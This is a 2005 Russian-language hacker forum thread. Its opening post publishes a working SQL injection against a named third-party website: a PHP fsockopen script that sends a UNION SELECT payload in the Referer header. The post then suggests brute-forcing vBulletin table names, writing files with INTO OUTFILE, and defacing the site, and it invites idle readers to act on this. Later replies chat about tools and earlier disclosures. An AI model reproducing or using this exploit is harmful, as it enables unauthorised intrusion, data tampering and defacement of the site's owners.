=d

Discussion in 'Уязвимости' started by Zadoxlik, 5 Dec 2005.

  1. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    skvoznoy.org

    Мимо проходил. Сайт из серии крутых хакеров:

    skvoznoy.org

    ____________________________________
    $fp=fsockopen("skvoznoy.org",80);

    fputs($fp,"GET http://skvoznoy.org/news/332/ HTTP/1.0
    Referer: http://skvoznoy.org/news/332/' union select 0,0/*

    ");
    $get= fgets($fp).fgets($fp).fgets($fp).fgets($fp)
    .fgets($fp).fgets($fp).fgets($fp).fgets($fp)
    .fgets($fp).fgets($fp)
    .fgets($fp).fgets($fp);
    fclose($fp);
    echo $get;
    ____________________________________

    SQL-инъекция классическая в реферере. Цветом выделено 0,0 - неверное количество колонок, чтобы показать ошибку при выводе $get. На самом деле колонка одна. Вот, на сайте стоит вБуллетин. Надо сбрутить только преффикс и возможно БД для форума и можно будет удалять/добавлять данные. А можно похимичить и с ИНТО ОУТФАЙЛ.
    Еще можно сбрутить имя таблицы новостей и задефейсить сайт
     
    #1 Zadoxlik, 5 Dec 2005
    Last edited: 5 Dec 2005
  2. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    Ты это к чему? Ты вопрос какойто задал?
     
  3. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    нет, дал пищу для размышлений и, возможно, каких-либо действий для тех кому заняться нечем
     
  4. PSalm69

    PSalm69 [ радиоверсия ]

    Joined:
    12 Jul 2005
    Messages:
    891
    Likes Received:
    300
    Reputations:
    530
    fsockopen очень уж часто я с ним сталкиваюсь. И понятно почему =)
    Надо же.... Zadoxlik рано в паблик скинул ИМХО =)
     
  5. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Это ты в исходниках посмсотрел?
     
    1 person likes this.
  6. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Блин жалко у меня ума не хватит что как делать а инькция у меня не вылазиет почему то.
     
    3 people like this.
  7. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Не, это просто пример эксплуатации с помощью PHP скрипта, ибо браузером ты такое не сделаешь.
    На сколько мне известно, все нормальные люди пользуют в таких случаях InetCrack (или как-то так), но у меня его нет.
     
  8. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Телнет =)
     
  9. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    интересно а зачем на паблик кинул=) я в скуле несилен к сожалению(
     
  10. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    хех, эту уявзимость уже я наверное месяц назад на паблик выложил (смотри в теме "бажные сайты от киборга").
    и никто даже не пытался прикрыть
     
  11. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Во-первых это не эта уязвимость, а во-вторых то что выложил ты, достаточно трудно превратить в уязвимость, а не багу сайта.

    Если я что ошибся, и имелось ввиду не
    "http://skvoznoy.org/news-cat/21'/"
    а что-то другое, то извините за неумышленный плагиат, тему можно будет удалить